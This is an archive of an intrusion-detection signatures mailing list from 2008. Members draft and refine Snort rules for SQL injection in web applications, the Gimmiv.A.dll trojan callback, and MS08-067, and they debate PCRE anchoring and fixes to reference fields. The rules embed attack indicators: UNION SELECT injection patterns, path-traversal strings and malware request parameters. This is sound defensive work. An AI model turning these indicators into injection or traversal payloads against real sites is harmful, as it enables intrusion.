Known Compromised or Hostile Host Traffic (62) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510061 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (62) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts -> Removed from emerging-sid-msg.map.txt (2): 2500061 || ET COMPROMISED Known Compromised or Hostile Host Traffic (62) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510061 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (62) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts From r.kerr at cranfield.ac.uk Wed Oct 22 16:24:30 2008 From: r.kerr at cranfield.ac.uk (Robert Kerr) Date: Wed, 22 Oct 2008 21:24:30 +0100 Subject: [Emerging-Sigs] StillSecure: 6 New Signatures - Oct-22-2008 In-Reply-To: <5C9E8CCEEB81ED498AC0C3B0054704F3054C290D@webmail.latis.com> References: <5C9E8CCEEB81ED498AC0C3B0054704F3054C290D@webmail.latis.com> Message-ID: <1224707070.15370.24.camel@clarity.local.home> On Wed, 2008-10-22 at 07:22 -0600, signatures wrote: > 6. XOOPS Makale Module id SQL Injection > > alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"XOOPS > Makale Module id SQL Injection"; flow:to_server,established; > content:"GET "; depth:4; uricontent:"/makale.php?id="; nocase; > pcre:"/UNION.+SELECT/Ui"; classtype:web-application-attack; > reference:url,secunia.com/advisories/32347/; > reference:url,www.milw0rm.com/exploits/6795; sid:8481; rev:1;) Can we have a discussion on the merits of pcre:"/UNION.+SELECT/Ui"; as appears in many of these rules. Two concerns: a) PCREs are slow and should be always be well anchored. Would make sense to precede each pcre with a uricontent:"UNION"; to prevent ?the pcre firing on every hit to pages which are otherwise legit b) The .+ seems overly permissive in that it allows 1 or more of any character in between the union and select? a quick look at other rules of these type seems to suggest they use UNION\s+SELECT Compare for example this rule: alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"ET WEB Cacti SQL Injection Vulnerability graph_view graph_list UNION SELECT"; flow:established,to_server; uricontent:"graph_view.php?"; nocase; uricontent:"graph_list="; nocase; uricontent:"UNION"; nocase; pcre:"/.+UNION\s+SELECT/Ui"; classtype:web-application-attack; reference:cve,CVE-2008-0785; reference:bugtraq,27749; sid:2007889; rev:2;) Not having looked deeply at any of the bugs concerned it may be possible there's something odd going on that makes \s+ not suitable? -- Robert Kerr From emerging at emergingthreats.net Thu Oct 23 16:00:08 2008 From: emerging at emergingthreats.net (emerging@emergingthreats.net) Date: Thu, 23 Oct 2008 16:00:08 -0400 (EDT) Subject: [Emerging-Sigs] Emerging Threats Daily Signature Changes Message-ID: <20081023200008.0B8AF45026@goliath.jonkmans.com> [***] Results from Oinkmaster started Thu Oct 23 16:00:07 2008 [***] [*] Rules modifications: [*] None. [+++] Added non-rule lines: [+++] -> Added to emerging-sid-msg.map (2): 2500061 || ET COMPROMISED Known Compromised or Hostile Host Traffic (62) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510061 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (62) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts -> Added to emerging-sid-msg.map.txt (2): 2500061 || ET COMPROMISED Known Compromised or Hostile Host Traffic (62) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510061 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (62) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts From msconzo at ercot.com Thu Oct 23 17:54:44 2008 From: msconzo at ercot.com (Sconzo, Michael) Date: Thu, 23 Oct 2008 16:54:44 -0500 Subject: [Emerging-Sigs] Gimmiv.A.dll Infection Sig Message-ID: <789A6CF2A624E54184956F80CCCAE8600143FA0F@CPWP016I.ercot.com> Haven't had a good chance to test this, but it seems like it will catch at least http://www.microsoft.com/security/portal/Entry.aspx?name=TrojanSpy%3aWin 32%2fGimmiv.A.dll infected hosts. It's a bit late at that time, but you can at least get a handle on any infected machines. Just needs a real sid in the sig. alert tcp $INTERNAL_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET Gimmiv.A.dll Infection"; flow: to_server,established; content:"test2.php"; nocase; content:"abc="; nocase; content:"def="; nocase; depth: 11; classtype: trojan-activity; sid: 0000000; rev:1;) I could be off-base on this one, if so sorry for the noise. -=Mike --- Mike Sconzo ERCOT Security Operations From msconzo at ercot.com Thu Oct 23 17:57:42 2008 From: msconzo at ercot.com (Sconzo, Michael) Date: Thu, 23 Oct 2008 16:57:42 -0500 Subject: [Emerging-Sigs] Gimmiv.A.dll Infection Sig In-Reply-To: <789A6CF2A624E54184956F80CCCAE8600143FA0F@CPWP016I.ercot.com> Message-ID: <789A6CF2A624E54184956F80CCCAE8600143FA10@CPWP016I.ercot.com> Need to remove the depth 11: alert tcp $INTERNAL_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET Gimmiv.A.dll Infection"; flow: to_server,established; content:"test2.php"; nocase; content:"abc="; nocase; content:"def="; nocase; classtype: trojan-activity; sid: 0000000; rev:2;) -----Original Message----- From: emerging-sigs-bounces at emergingthreats.net [mailto:emerging-sigs-bounces at emergingthreats.net] On Behalf Of Sconzo, Michael Sent: Thursday, October 23, 2008 4:55 PM To: Emerging Threats Signatures Subject: [Emerging-Sigs] Gimmiv.A.dll Infection Sig Haven't had a good chance to test this, but it seems like it will catch at least http://www.microsoft.com/security/portal/Entry.aspx?name=TrojanSpy%3aWin 32%2fGimmiv.A.dll infected hosts. It's a bit late at that time, but you can at least get a handle on any infected machines. Just needs a real sid in the sig. alert tcp $INTERNAL_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET Gimmiv.A.dll Infection"; flow: to_server,established; content:"test2.php"; nocase; content:"abc="; nocase; content:"def="; nocase; depth: 11; classtype: trojan-activity; sid: 0000000; rev:1;) I could be off-base on this one, if so sorry for the noise. -=Mike --- Mike Sconzo ERCOT Security Operations _______________________________________________ Emerging-sigs mailing list Emerging-sigs at emergingthreats.net http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs From msconzo at ercot.com Thu Oct 23 19:39:04 2008 From: msconzo at ercot.com (Sconzo, Michael) Date: Thu, 23 Oct 2008 18:39:04 -0500 Subject: [Emerging-Sigs] Gimmiv.A.dll Infection Sig In-Reply-To: <789A6CF2A624E54184956F80CCCAE8600143FA10@CPWP016I.ercot.com> Message-ID: <789A6CF2A624E54184956F80CCCAE8600143FA12@CPWP016I.ercot.com> I've gotten a couple of pings about this. Here's some more info: http://www.virustotal.com/analisis/aa0b4951ba47a5780a4fe9d0fdf6d521 Check out the threat expert link at the bottom for some analysis of the software. -=Mike -----Original Message----- From: emerging-sigs-bounces at emergingthreats.net [mailto:emerging-sigs-bounces at emergingthreats.net] On Behalf Of Sconzo, Michael Sent: Thursday, October 23, 2008 4:58 PM To: Emerging Threats Signatures Subject: Re: [Emerging-Sigs] Gimmiv.A.dll Infection Sig Need to remove the depth 11: alert tcp $INTERNAL_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET Gimmiv.A.dll Infection"; flow: to_server,established; content:"test2.php"; nocase; content:"abc="; nocase; content:"def="; nocase; classtype: trojan-activity; sid: 0000000; rev:2;) -----Original Message----- From: emerging-sigs-bounces at emergingthreats.net [mailto:emerging-sigs-bounces at emergingthreats.net] On Behalf Of Sconzo, Michael Sent: Thursday, October 23, 2008 4:55 PM To: Emerging Threats Signatures Subject: [Emerging-Sigs] Gimmiv.A.dll Infection Sig Haven't had a good chance to test this, but it seems like it will catch at least http://www.microsoft.com/security/portal/Entry.aspx?name=TrojanSpy%3aWin 32%2fGimmiv.A.dll infected hosts. It's a bit late at that time, but you can at least get a handle on any infected machines. Just needs a real sid in the sig. alert tcp $INTERNAL_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET Gimmiv.A.dll Infection"; flow: to_server,established; content:"test2.php"; nocase; content:"abc="; nocase; content:"def="; nocase; depth: 11; classtype: trojan-activity; sid: 0000000; rev:1;) I could be off-base on this one, if so sorry for the noise. -=Mike --- Mike Sconzo ERCOT Security Operations _______________________________________________ Emerging-sigs mailing list Emerging-sigs at emergingthreats.net http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs _______________________________________________ Emerging-sigs mailing list Emerging-sigs at emergingthreats.net http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs From jonkman at jonkmans.com Thu Oct 23 19:47:14 2008 From: jonkman at jonkmans.com (Matt Jonkman) Date: Thu, 23 Oct 2008 19:47:14 -0400 Subject: [Emerging-Sigs] MS08-067 Sigs Message-ID: <49010D02.7010209@jonkmans.com> Great new stuff from Secureworks! http://www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/EXPLOIT/EXPLOIT_MS08-067?rev=1.1 Sigs for the latest MS vuln, patch just released out of cycle. This may be a big one so watch these closely. There is malware exploiting it, which there are also sigs up for. Matt -- -------------------------------------------- Matthew Jonkman Emerging Threats Phone 765-429-0398 Fax 312-264-0205 http://www.emergingthreats.net -------------------------------------------- PGP: http://www.jonkmans.com/mattjonkman.asc From jonkman at jonkmans.com Thu Oct 23 19:48:39 2008 From: jonkman at jonkmans.com (Matt Jonkman) Date: Thu, 23 Oct 2008 19:48:39 -0400 Subject: [Emerging-Sigs] Gimmiv.A.dll Infection Sig In-Reply-To: <789A6CF2A624E54184956F80CCCAE8600143FA12@CPWP016I.ercot.com> References: <789A6CF2A624E54184956F80CCCAE8600143FA12@CPWP016I.ercot.com> Message-ID: <49010D57.4060604@jonkmans.com> Hi Michael. Posting now sorry for the delay. Any reason not to go uricontent on these? matt Sconzo, Michael wrote: > I've gotten a couple of pings about this. Here's some more info: > http://www.virustotal.com/analisis/aa0b4951ba47a5780a4fe9d0fdf6d521 > > Check out the threat expert link at the bottom for some analysis of the > software. > > -=Mike > > -----Original Message----- > From: emerging-sigs-bounces at emergingthreats.net > [mailto:emerging-sigs-bounces at emergingthreats.net] On Behalf Of Sconzo, > Michael > Sent: Thursday, October 23, 2008 4:58 PM > To: Emerging Threats Signatures > Subject: Re: [Emerging-Sigs] Gimmiv.A.dll Infection Sig > > Need to remove the depth 11: > > alert tcp $INTERNAL_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET > Gimmiv.A.dll Infection"; flow: to_server,established; > content:"test2.php"; nocase; content:"abc="; nocase; content:"def="; > nocase; classtype: trojan-activity; sid: 0000000; rev:2;) > > -----Original Message----- > From: emerging-sigs-bounces at emergingthreats.net > [mailto:emerging-sigs-bounces at emergingthreats.net] On Behalf Of Sconzo, > Michael > Sent: Thursday, October 23, 2008 4:55 PM > To: Emerging Threats Signatures > Subject: [Emerging-Sigs] Gimmiv.A.dll Infection Sig > > Haven't had a good chance to test this, but it seems like it will catch > at least > http://www.microsoft.com/security/portal/Entry.aspx?name=TrojanSpy%3aWin > 32%2fGimmiv.A.dll infected hosts. It's a bit late at that time, but you > can at least get a handle on any infected machines. > > Just needs a real sid in the sig. > > > alert tcp $INTERNAL_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET > Gimmiv.A.dll Infection"; flow: to_server,established; > content:"test2.php"; nocase; content:"abc="; nocase; content:"def="; > nocase; depth: 11; classtype: trojan-activity; sid: 0000000; rev:1;) > > I could be off-base on this one, if so sorry for the noise. > > -=Mike > > --- > Mike Sconzo > ERCOT Security Operations > > _______________________________________________ > Emerging-sigs mailing list > Emerging-sigs at emergingthreats.net > http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs > _______________________________________________ > Emerging-sigs mailing list > Emerging-sigs at emergingthreats.net > http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs > _______________________________________________ > Emerging-sigs mailing list > Emerging-sigs at emergingthreats.net > http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs -- -------------------------------------------- Matthew Jonkman Emerging Threats Phone 765-429-0398 Fax 312-264-0205 http://www.emergingthreats.net -------------------------------------------- PGP: http://www.jonkmans.com/mattjonkman.asc From msconzo at ercot.com Thu Oct 23 19:53:09 2008 From: msconzo at ercot.com (Sconzo, Michael) Date: Thu, 23 Oct 2008 18:53:09 -0500 Subject: [Emerging-Sigs] Gimmiv.A.dll Infection Sig In-Reply-To: <49010D57.4060604@jonkmans.com> Message-ID: <789A6CF2A624E54184956F80CCCAE8600143FA14@CPWP016I.ercot.com> I've got no good reason other then that's what I came up with originally in a quick-n-dirty fashion. :) It's probably better to switch to uricontent. -=Mike -----Original Message----- From: Matt Jonkman [mailto:jonkman at jonkmans.com] Sent: Thursday, October 23, 2008 6:49 PM To: Sconzo, Michael Cc: Emerging Threats Signatures Subject: Re: [Emerging-Sigs] Gimmiv.A.dll Infection Sig Hi Michael. Posting now sorry for the delay. Any reason not to go uricontent on these? matt Sconzo, Michael wrote: > I've gotten a couple of pings about this. Here's some more info: > http://www.virustotal.com/analisis/aa0b4951ba47a5780a4fe9d0fdf6d521 > > Check out the threat expert link at the bottom for some analysis of the > software. > > -=Mike > > -----Original Message----- > From: emerging-sigs-bounces at emergingthreats.net > [mailto:emerging-sigs-bounces at emergingthreats.net] On Behalf Of Sconzo, > Michael > Sent: Thursday, October 23, 2008 4:58 PM > To: Emerging Threats Signatures > Subject: Re: [Emerging-Sigs] Gimmiv.A.dll Infection Sig > > Need to remove the depth 11: > > alert tcp $INTERNAL_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET > Gimmiv.A.dll Infection"; flow: to_server,established; > content:"test2.php"; nocase; content:"abc="; nocase; content:"def="; > nocase; classtype: trojan-activity; sid: 0000000; rev:2;) > > -----Original Message----- > From: emerging-sigs-bounces at emergingthreats.net > [mailto:emerging-sigs-bounces at emergingthreats.net] On Behalf Of Sconzo, > Michael > Sent: Thursday, October 23, 2008 4:55 PM > To: Emerging Threats Signatures > Subject: [Emerging-Sigs] Gimmiv.A.dll Infection Sig > > Haven't had a good chance to test this, but it seems like it will catch > at least > http://www.microsoft.com/security/portal/Entry.aspx?name=TrojanSpy%3aWin > 32%2fGimmiv.A.dll infected hosts. It's a bit late at that time, but you > can at least get a handle on any infected machines. > > Just needs a real sid in the sig. > > > alert tcp $INTERNAL_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET > Gimmiv.A.dll Infection"; flow: to_server,established; > content:"test2.php"; nocase; content:"abc="; nocase; content:"def="; > nocase; depth: 11; classtype: trojan-activity; sid: 0000000; rev:1;) > > I could be off-base on this one, if so sorry for the noise. > > -=Mike > > --- > Mike Sconzo > ERCOT Security Operations > > _______________________________________________ > Emerging-sigs mailing list > Emerging-sigs at emergingthreats.net > http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs > _______________________________________________ > Emerging-sigs mailing list > Emerging-sigs at emergingthreats.net > http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs > _______________________________________________ > Emerging-sigs mailing list > Emerging-sigs at emergingthreats.net > http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs -- -------------------------------------------- Matthew Jonkman Emerging Threats Phone 765-429-0398 Fax 312-264-0205 http://www.emergingthreats.net -------------------------------------------- PGP: http://www.jonkmans.com/mattjonkman.asc From jonkman at jonkmans.com Thu Oct 23 19:56:26 2008 From: jonkman at jonkmans.com (Matt Jonkman) Date: Thu, 23 Oct 2008 19:56:26 -0400 Subject: [Emerging-Sigs] Gimmiv.A.dll Infection Sig In-Reply-To: <789A6CF2A624E54184956F80CCCAE8600143FA14@CPWP016I.ercot.com> References: <789A6CF2A624E54184956F80CCCAE8600143FA14@CPWP016I.ercot.com> Message-ID: <49010F2A.6020802@jonkmans.com> Done deal, posted! Thanks Michael Matt Sconzo, Michael wrote: > I've got no good reason other then that's what I came up with originally > in a quick-n-dirty fashion. :) > > It's probably better to switch to uricontent. > > -=Mike > > -----Original Message----- > From: Matt Jonkman [mailto:jonkman at jonkmans.com] > Sent: Thursday, October 23, 2008 6:49 PM > To: Sconzo, Michael > Cc: Emerging Threats Signatures > Subject: Re: [Emerging-Sigs] Gimmiv.A.dll Infection Sig > > Hi Michael. Posting now sorry for the delay. Any reason not to go > uricontent on these? > > matt > > Sconzo, Michael wrote: >> I've gotten a couple of pings about this. Here's some more info: >> http://www.virustotal.com/analisis/aa0b4951ba47a5780a4fe9d0fdf6d521 >> >> Check out the threat expert link at the bottom for some analysis of > the >> software. >> >> -=Mike >> >> -----Original Message----- >> From: emerging-sigs-bounces at emergingthreats.net >> [mailto:emerging-sigs-bounces at emergingthreats.net] On Behalf Of > Sconzo, >> Michael >> Sent: Thursday, October 23, 2008 4:58 PM >> To: Emerging Threats Signatures >> Subject: Re: [Emerging-Sigs] Gimmiv.A.dll Infection Sig >> >> Need to remove the depth 11: >> >> alert tcp $INTERNAL_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET >> Gimmiv.A.dll Infection"; flow: to_server,established; >> content:"test2.php"; nocase; content:"abc="; nocase; content:"def="; >> nocase; classtype: trojan-activity; sid: 0000000; rev:2;) >> >> -----Original Message----- >> From: emerging-sigs-bounces at emergingthreats.net >> [mailto:emerging-sigs-bounces at emergingthreats.net] On Behalf Of > Sconzo, >> Michael >> Sent: Thursday, October 23, 2008 4:55 PM >> To: Emerging Threats Signatures >> Subject: [Emerging-Sigs] Gimmiv.A.dll Infection Sig >> >> Haven't had a good chance to test this, but it seems like it will > catch >> at least >> > http://www.microsoft.com/security/portal/Entry.aspx?name=TrojanSpy%3aWin >> 32%2fGimmiv.A.dll infected hosts. It's a bit late at that time, but > you >> can at least get a handle on any infected machines. >> >> Just needs a real sid in the sig. >> >> >> alert tcp $INTERNAL_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET >> Gimmiv.A.dll Infection"; flow: to_server,established; >> content:"test2.php"; nocase; content:"abc="; nocase; content:"def="; >> nocase; depth: 11; classtype: trojan-activity; sid: 0000000; rev:1;) >> >> I could be off-base on this one, if so sorry for the noise. >> >> -=Mike >> >> --- >> Mike Sconzo >> ERCOT Security Operations >> >> _______________________________________________ >> Emerging-sigs mailing list >> Emerging-sigs at emergingthreats.net >> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs >> _______________________________________________ >> Emerging-sigs mailing list >> Emerging-sigs at emergingthreats.net >> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs >> _______________________________________________ >> Emerging-sigs mailing list >> Emerging-sigs at emergingthreats.net >> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs > -- -------------------------------------------- Matthew Jonkman Emerging Threats Phone 765-429-0398 Fax 312-264-0205 http://www.emergingthreats.net -------------------------------------------- PGP: http://www.jonkmans.com/mattjonkman.asc From jsawyer at ufl.edu Thu Oct 23 21:14:19 2008 From: jsawyer at ufl.edu (John H. Sawyer) Date: Thu, 23 Oct 2008 21:14:19 -0400 Subject: [Emerging-Sigs] MS08-067 Sigs In-Reply-To: <49010D02.7010209@jonkmans.com> References: <49010D02.7010209@jonkmans.com> Message-ID: <12991C02-5757-430E-96D5-2A2B9CD64AE3@ufl.edu> I ran into a few problems with several of the rules. There are some missing escapes and quotes. All rules with "..\..\" had to become "..\\..\\" All rules with "../../ had to become "../../" -jhs On Oct 23, 2008, at 7:47 PM, Matt Jonkman wrote: > Great new stuff from Secureworks! > > http://www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/EXPLOIT/EXPLOIT_MS08-067?rev=1.1 > > Sigs for the latest MS vuln, patch just released out of cycle. This > may > be a big one so watch these closely. There is malware exploiting it, > which there are also sigs up for. > > Matt > > -- > -------------------------------------------- > Matthew Jonkman > Emerging Threats > Phone 765-429-0398 > Fax 312-264-0205 > http://www.emergingthreats.net > -------------------------------------------- > > PGP: http://www.jonkmans.com/mattjonkman.asc > > > _______________________________________________ > Emerging-sigs mailing list > Emerging-sigs at emergingthreats.net > http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs > From jonkman at jonkmans.com Thu Oct 23 22:49:28 2008 From: jonkman at jonkmans.com (Matt Jonkman) Date: Thu, 23 Oct 2008 22:49:28 -0400 Subject: [Emerging-Sigs] MS08-067 Sigs In-Reply-To: <12991C02-5757-430E-96D5-2A2B9CD64AE3@ufl.edu> References: <49010D02.7010209@jonkmans.com> <12991C02-5757-430E-96D5-2A2B9CD64AE3@ufl.edu> Message-ID: <490137B8.4060301@jonkmans.com> Ya, fixed that up as I posted them. The version that committed was correct. Matt John H. Sawyer wrote: > I ran into a few problems with several of the rules. There are some > missing escapes and quotes. > > All rules with "..\..\" had to become "..\\..\\" > > All rules with "../../ had to become "../../" > > -jhs > > On Oct 23, 2008, at 7:47 PM, Matt Jonkman wrote: > >> Great new stuff from Secureworks! >> >> http://www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/EXPLOIT/EXPLOIT_MS08-067?rev=1.1 >> >> Sigs for the latest MS vuln, patch just released out of cycle. This >> may >> be a big one so watch these closely. There is malware exploiting it, >> which there are also sigs up for. >> >> Matt >> >> -- >> -------------------------------------------- >> Matthew Jonkman >> Emerging Threats >> Phone 765-429-0398 >> Fax 312-264-0205 >> http://www.emergingthreats.net >> -------------------------------------------- >> >> PGP: http://www.jonkmans.com/mattjonkman.asc >> >> >> _______________________________________________ >> Emerging-sigs mailing list >> Emerging-sigs at emergingthreats.net >> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs >> > > _______________________________________________ > Emerging-sigs mailing list > Emerging-sigs at emergingthreats.net > http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs -- -------------------------------------------- Matthew Jonkman Emerging Threats Phone 765-429-0398 Fax 312-264-0205 http://www.emergingthreats.net -------------------------------------------- PGP: http://www.jonkmans.com/mattjonkman.asc From snort at leeclemens.net Thu Oct 23 23:29:33 2008 From: snort at leeclemens.net (Lee Clemens) Date: Thu, 23 Oct 2008 23:29:33 -0400 Subject: [Emerging-Sigs] Bad Reference: sid:2008681 Message-ID: <006401c93588$bc73f470$c921de0a@edl1314rmfsp7> Looks like the update to 2008681 is missing the System 'url' from the reference keyword. reference:www.trendmicro[...] Should be: reference:url,www.trendmicro[...] From dxp2532 at gmail.com Fri Oct 24 00:25:14 2008 From: dxp2532 at gmail.com (dxp) Date: Fri, 24 Oct 2008 00:25:14 -0400 Subject: [Emerging-Sigs] Gimmiv.A.dll Infection Sig In-Reply-To: <49010F2A.6020802@jonkmans.com> References: <789A6CF2A624E54184956F80CCCAE8600143FA14@CPWP016I.ercot.com> <49010F2A.6020802@jonkmans.com> Message-ID: <637078af0810232125vcac0298j102120cc10878fd1@mail.gmail.com> Looking at other Gimmiv threatexpert reports it appears that "/test2.php" is not static, the number varies. So far it looks like a single digit integer, so perhaps a pattern match for something like "/test[0-9].php" would be better. -- dxp On Thu, Oct 23, 2008 at 7:56 PM, Matt Jonkman wrote: > Done deal, posted! > > Thanks Michael > > Matt > > Sconzo, Michael wrote: > > I've got no good reason other then that's what I came up with originally > > in a quick-n-dirty fashion. :) > > > > It's probably better to switch to uricontent. > > > > -=Mike > > > > -----Original Message----- > > From: Matt Jonkman [mailto:jonkman at jonkmans.com] > > Sent: Thursday, October 23, 2008 6:49 PM > > To: Sconzo, Michael > > Cc: Emerging Threats Signatures > > Subject: Re: [Emerging-Sigs] Gimmiv.A.dll Infection Sig > > > > Hi Michael. Posting now sorry for the delay. Any reason not to go > > uricontent on these? > > > > matt > > > > Sconzo, Michael wrote: > >> I've gotten a couple of pings about this. Here's some more info: > >> http://www.virustotal.com/analisis/aa0b4951ba47a5780a4fe9d0fdf6d521 > >> > >> Check out the threat expert link at the bottom for some analysis of > > the > >> software. > >> > >> -=Mike > >> > >> -----Original Message----- > >> From: emerging-sigs-bounces at emergingthreats.net > >> [mailto:emerging-sigs-bounces at emergingthreats.net] On Behalf Of > > Sconzo, > >> Michael > >> Sent: Thursday, October 23, 2008 4:58 PM > >> To: Emerging Threats Signatures > >> Subject: Re: [Emerging-Sigs] Gimmiv.A.dll Infection Sig > >> > >> Need to remove the depth 11: > >> > >> alert tcp $INTERNAL_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET > >> Gimmiv.A.dll Infection"; flow: to_server,established; > >> content:"test2.php"; nocase; content:"abc="; nocase; content:"def="; > >> nocase; classtype: trojan-activity; sid: 0000000; rev:2;) > >> > >> -----Original Message----- > >> From: emerging-sigs-bounces at emergingthreats.net > >> [mailto:emerging-sigs-bounces at emergingthreats.net] On Behalf Of > > Sconzo, > >> Michael > >> Sent: Thursday, October 23, 2008 4:55 PM > >> To: Emerging Threats Signatures > >> Subject: [Emerging-Sigs] Gimmiv.A.dll Infection Sig > >> > >> Haven't had a good chance to test this, but it seems like it will > > catch > >> at least > >> > > http://www.microsoft.com/security/portal/Entry.aspx?name=TrojanSpy%3aWin > >> 32%2fGimmiv.A.dll infected hosts. It's a bit late at that time, but > > you > >> can at least get a handle on any infected machines. > >> > >> Just needs a real sid in the sig. > >> > >> > >> alert tcp $INTERNAL_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET > >> Gimmiv.A.dll Infection"; flow: to_server,established; > >> content:"test2.php"; nocase; content:"abc="; nocase; content:"def="; > >> nocase; depth: 11; classtype: trojan-activity; sid: 0000000; rev:1;) > >> > >> I could be off-base on this one, if so sorry for the noise. > >> > >> -=Mike > >> > >> --- > >> Mike Sconzo > >> ERCOT Security Operations > >> > >> _______________________________________________ > >> Emerging-sigs mailing list > >> Emerging-sigs at emergingthreats.net > >> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs > >> _______________________________________________ > >> Emerging-sigs mailing list > >> Emerging-sigs at emergingthreats.net > >> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs > >> _______________________________________________ > >> Emerging-sigs mailing list > >> Emerging-sigs at emergingthreats.net > >> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs > > > > -- > -------------------------------------------- > Matthew Jonkman > Emerging Threats > Phone 765-429-0398 > Fax 312-264-0205 > http://www.emergingthreats.net > -------------------------------------------- > > PGP: http://www.jonkmans.com/mattjonkman.asc > > > _______________________________________________ > Emerging-sigs mailing list > Emerging-sigs at emergingthreats.net > http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs > -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.emergingthreats.net/pipermail/emerging-sigs/attachments/20081024/f6176091/attachment.html From frank at knobbe.us Fri Oct 24 00:26:42 2008 From: frank at knobbe.us (Frank Knobbe) Date: Thu, 23 Oct 2008 23:26:42 -0500 Subject: [Emerging-Sigs] Bad Reference: sid:2008681 In-Reply-To: <006401c93588$bc73f470$c921de0a@edl1314rmfsp7> References: <006401c93588$bc73f470$c921de0a@edl1314rmfsp7> Message-ID: <1224822402.38559.83.camel@localhost> On Thu, 2008-10-23 at 23:29 -0400, Lee Clemens wrote: > Looks like the update to 2008681 is missing the System 'url' from the > reference keyword. > > reference:www.trendmicro[...] > Should be: > reference:url,www.trendmicro[...] Indeed. It's fixed in CVS now. Tarballs should be updated shortly. Thanks! Frank -- It is said that the Internet is a public utility. As such, it is best compared to a sewer. A big, fat pipe with a bunch of crap sloshing against your ports. -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 187 bytes Desc: This is a digitally signed message part Url : http://lists.emergingthreats.net/pipermail/emerging-sigs/attachments/20081023/6807fec4/attachment.bin From signatures at stillsecure.com Fri Oct 24 09:08:32 2008 From: signatures at stillsecure.com (signatures) Date: Fri, 24 Oct 2008 07:08:32 -0600 Subject: [Emerging-Sigs] StillSecure: 4 New Signatures - Oct-24-2008 Message-ID: <5C9E8CCEEB81ED498AC0C3B0054704F3054C290E@webmail.latis.com> Hi Matt, Please find 4 New Signatures below: 1. Simple Customer contact.php SQL injection alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"Simple Customer contact.php SQL injection"; flow:to_server,established; content:"GET "; depth:4; uricontent:"/contact.php?id="; nocase; uricontent:"UNION"; nocase; pcre:"/UNION.+SELECT/Ui"; classtype:web-application-attack; reference:bugtraq,28852; sid:8518; rev:1;) 2. ShopMaker product.php id Parameter Remote SQL Injection alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"ShopMaker product.php id Parameter Remote SQL Injection"; flow:to_server,established; content:"GET "; depth:4; uricontent:"/product.php?id="; nocase; uricontent:"UNION"; nocase; pcre:"/UNION.+SELECT/Ui"; classtype:web-application-attack; reference:url,www.milw0rm.com/exploits/6799; reference:bugtraq,31854; sid:8519; rev:1;) 3. Bahar Download Script aspkat.asp SQL Injection alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"Bahar Download Script aspkat.asp SQL Injection"; flow:established,to_server; content:"GET "; depth:4; uricontent:"/aspkat.asp?kid="; nocase; uricontent:"UNION"; nocase; pcre:"/UNION.+SELECT/Ui"; classtype:web-application-attack; reference:bugtraq,31852; sid:8520; rev:1;) 4. WordPress Newsletter Plugin newsletter Parameter SQL Injection alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"WordPress Newsletter Plugin newsletter Parameter SQL Injection"; flow:to_server,established; content:"GET "; depth:4; uricontent:"/st_newsletter/stnl_iframe.php"; nocase; uricontent:"?newsletter="; nocase; uricontent:"UNION"; nocase; pcre:"/UNION.+SELECT/Ui"; classtype:web-application-attack; reference:url,milw0rm.com/exploits/6777; reference:url,secunia.com/advisories/32336; sid:8521; rev:1;) Looking forward for your comments if any... Thanks & Regards, StillSecure -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.emergingthreats.net/pipermail/emerging-sigs/attachments/20081024/a3243204/attachment-0001.html From jonkman at jonkmans.com Fri Oct 24 09:15:30 2008 From: jonkman at jonkmans.com (Matt Jonkman) Date: 